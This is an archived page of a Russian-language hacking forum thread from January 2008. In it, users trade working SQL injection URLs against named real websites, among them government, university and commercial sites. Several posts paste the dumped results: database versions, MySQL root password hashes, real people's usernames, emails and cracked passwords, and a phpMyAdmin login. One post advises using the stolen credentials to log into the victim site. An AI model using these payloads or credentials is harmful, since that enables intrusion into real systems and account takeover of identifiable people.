ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4411  
Старый 08.01.2008, 23:31
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

www.agroelsalvador.com
Цитата:
http://www.agroelsalvador.com/directorio/index.php?idDirectorio=-652+union+select+1,concat_ws(0x3a,user,password),3 ,4,5,6,7,8,9,0,1+from+mysql.user/*
полностю раскрученная
http://www.agroelsalvador.com/phpmyadmin
mag:mag112
 
Ответить с цитированием

  #4412  
Старый 08.01.2008, 23:34
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию

http://www.networkofdisclosure.com/

Код HTML:
http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database()),4/*
5.0.45-community:networko_user@localhost:networko_db

Код HTML:
http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,user_id,username,user_password),4+FROM+users+LIMIT+10,1/*
4:Jay Fishman:bf4cf16ad122a0cdc77b3c84b637219f::f1shman
5:Brad Hamann:00cdb7bb942cf6b290ceb97d6aca64a3:: password7
7:Brent Moeshlin:7c3d0453108aefa46c07e91c8bc031d3:: officer1
9:Court Eilertson:6db6339dbf5ebc3ce4b1af93a8dfec58::count1


Код HTML:
http://www.networkofdisclosure.com/latest_news.php?news_id=-26+UNION+SELECT+1,2,concat_ws(0x3a,member_id,email,password),4+FROM+member+LIMIT+7,1/*
27:jaybfishman@aol.com:bf4cf16ad122a0cdc77b3c84b63 7219f::f1shman
7:bmoeshlin@qualitycomix.com:7c3d0453108aefa46c07e 91c8bc031d3:: officer1
9:ceilert@msn.com:6db6339dbf5ebc3ce4b1af93a8dfec58 ::count1
2:Nearmint@aol.com:f1c943880885e79825464b0f86f80f6 e::424344


С мейл:пас сюда: http://www.networkofdisclosure.com/login.php,
а там можно еще зайти под тем же логином на форум. Кнопка Member's Forum.
 
Ответить с цитированием

  #4413  
Старый 08.01.2008, 23:38
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

Прошу прощения если боян,на форуме не нашел скуль с этим сайтом


http://www.5ballov.ru/vacansy.php?salary_min=null+union+select+1,2,3,4,5 ,6,7,concat(table_name,0x3a,column_name),9,10,11,1 2,13,14,15,16,17,18,19,20+from+information_schema. columns/*
вывод-все сразу



http://www.5ballov.ru/vacansy.php?salary_min=null+union+select+1,2,3,4,5 ,6,7,count(0x3a,name,nick,log,pas,email),9,10,11,1 2,13,14,15,16,17,18,19,20+from+users/*

единственная таблица с интересным юзеров больше 20000
 
Ответить с цитированием

  #4414  
Старый 08.01.2008, 23:52
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

http://guvd72.ru/index.php?module_name=news&action=show_full&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4/*

4.1.22-standard-log/guvd72r_db/guvd72r_user@localhost
-----------------------------------------------------------------------------

http://www.energots.ru/ru/?publication=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7/*

4.0.26-log/udb921/Uwww921S@localhost
-----------------------------------------------------------------------------

showbizer.com


http://ru.showbizer.com/news_firm.php?id_news=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),d atabase(),user()),6,7,8,9,10,11,12/*

5.0.45-log/showbiz/showbiz@localhost



http://ru.showbizer.com/news_firm.php?id_news=-1'+union+select+1,2,3,4,concat_ws(0x2F,login,passw ord,e_mail),6,7,8,9,10,11,12+from+sb_firms+limit+1 ,1/*

логин/пароль/мейл
aviator/8196/concert@mamamusic.ua
 
Ответить с цитированием

  #4415  
Старый 09.01.2008, 00:03
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://www.rodina.by/book/info/go/-83181%20union%20select%201,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2%20from%20accounts/*.html
Код:
http://www.rodina.by/book/info/go/-83181%20union%20select%201,name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2%20from%20members/*.html
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #4416  
Старый 09.01.2008, 01:32
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684

Репутация: 3908
По умолчанию

http://www.metrovalencia.gob.ve/ Метро Венесуэлы=)

Код:
http://www.metrovalencia.gob.ve/contenido.php?id=-1'+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),database(),version()),0x78),0x78),8,9,10,11,12,13,14,15,16,17,18/*
http://www.mes.gov.ve/ Министерство Высшего Образования Венесуэлы

Код:
http://www.mes.gov.ve/informa/noticias.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8/*
http://inforc.org.ve/ Национальный Институт Дополнительного Высшего Образования Венесуэлы

Код:
http://inforc.org.ve/detalle_evento.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
 
Ответить с цитированием

  #4417  
Старый 09.01.2008, 01:37
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию

2Ded MustD!e: А Венесуэла это где? =\
http://nhia.edu
Цитата:
http://www.nhia.edu/news.php?id=-1+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(VERSI ON(),0x71),0x71),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26/*
БД 4. Таблицы не удалось подобрать, админка в стандартной /admin/.
http://knigki.ru/
Цитата:
http://knigki.ru/sexylib/list.php?gid=-1+UNION+SELECT+VERSION()/*
Извращенцы. Всякие тупые порно рассказы, БД 5.

Последний раз редактировалось А®ТеS; 09.01.2008 в 01:53..
 
Ответить с цитированием

  #4418  
Старый 09.01.2008, 01:44
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://www.mdnationwide.tv/news.php?submit_action=article&nid=-1+union+select+1,concat_ws(0x2f,version(),user(),d atabase()),3,4,5,6/*
4.1.20/mdnationwidetv@localhost/mdnationwidetv
-----------------------------------------------------------------------
Все таблицы:
http://www.punjabtv.tv/news.php?id=-3552+union+select+1,table_name,3,4,5,6,7,8,9+from+ information_schema.tables/*
Все колонки
http://www.punjabtv.tv/news.php?id=-3552+union+select+1,column_name,3,4,5,6,7,8,9+from +information_schema.columns/*
Есть полезные таблицы:
user
users
Колонки ищите сами))
-----------------------------------------------------------------------
http://library.tc.columbia.edu/news.php?id=208'
Извините за пост...В MsSQL не раздираюсь...вот вам...вы разберетесь))
-----------------------------------------------------------------------
http://wolfpack.loyno.edu/news.php?action=view&id=-1270+union+select+1,CONVERT(concat_ws(0x3a,version (),user(),database())+using+latin1),3,4,5/*
4.1.12-standard-log:klein@localhost:wolfpack
-----------------------------------------------------------------------
http://www.entrepreneurship.appstate.edu/news.php?id=-46+union+select+1,concat_ws(0x2f,version(),user(), database()),3,4,5,6/*
4.1.20/entrepreneur@localhost/entrepreneur
-----------------------------------------------------------------------
http://www.eng.wayne.edu/news.php?id=-852+union+select+1,2,3,pwd,5,6,7,8,9,10,11,12,13+f rom+users/*
Колонки не подобрал
-----------------------------------------------------------------------
Все таблицы:
http://www.multimedia.edu/news.php?id=-7+union+select+1,2,table_name,4,5+from+information _schema.tables/*
Все колонки:
http://www.multimedia.edu/news.php?id=-7+union+select+1,2,column_name,4,5+from+informatio n_schema.columns/*
-----------------------------------------------------------------------
http://vl2.gallaudet.edu/news.php?id=-20+union+select+1,2,concat(user,char(58),password) ,4,5,6,7,8,9,10,11+from+mysql.user/*
root:*90B8B931F28082EF4AD1DA2A8787314B0A4246AA

Последний раз редактировалось Tigger; 09.01.2008 в 12:57..
 
Ответить с цитированием

  #4419  
Старый 09.01.2008, 11:45
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

avtomir.ru - Группа компаний Автомир, крупнейший автомобильный дилер в России
Код:
http://www.avtomir.ru/ru/news/index.php?id4=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15/*
4.1.22:avtomir-www:avtomir-www@localhost

Нашёл табу ADMINISTRATOR с полями LOGIN и EMAIL
 
Ответить с цитированием

  #4420  
Старый 09.01.2008, 13:32
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

http://www.akata.fr/news.php?id=-176+union+select+1,concat_ws(0x2f,version(),user() ,database()),3,4,5,6,7,8,9,10/*
4.0.17-standard-log/akatav2@10.0.62.16/akatav2
-----------------------------------------------------------------------
http://www.internazionale.fr/news.php?id=-1529+union+select+1,concat_ws(0x2f,version(),user( ),database()),3,4,5,6,7,8,9/*
4.1.22-log/internazionale@localhost/interklan
-----------------------------------------------------------------------
http://www.logiconfor.fr/news.php?id=-19+union+select+1,2,concat_ws(0x2f,version(),user( ),database()),4/*
5.0.44-log/logiconf001@10.0.78.3/logiconf001
-----------------------------------------------------------------------
http://www.sequant.com/sn/news.php?id=-22+union+select+1,2,3,concat_ws(0x2f,version(),use r(),database()),5,6/*
4.1.21-Max/u1015325_xCR5CZ6@83.168.227.153/db1015325_sequant
-----------------------------------------------------------------------
http://sever.co.il
http://sever.co.il/news.php?id=-78+union+select+1,2,3,concat(user,char(58),passwor d),5,6,7,8,9+from+mysql.user/*
root:*1611455133BEB42BD070C44CBDCDCAEDB73E9156
Дальше можно через лимит...например: http://sever.co.il/news.php?id=-78+union+select+1,2,3,concat(user,char(58),passwor d),5,6,7,8,9+from+mysql.user+limit+1,50/*
Все таблицы:
http://sever.co.il/news.php?id=-78+union+select+1,2,3,table_name,5,6,7,8,9+from+in formation_schema.tables+limit+15,100/*
Все колонки:
http://sever.co.il/news.php?id=-78+union+select+1,2,3,column_name,5,6,7,8,9+from+i nformation_schema.columns+limit+15,100/*
-----------------------------------------------------------------------
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ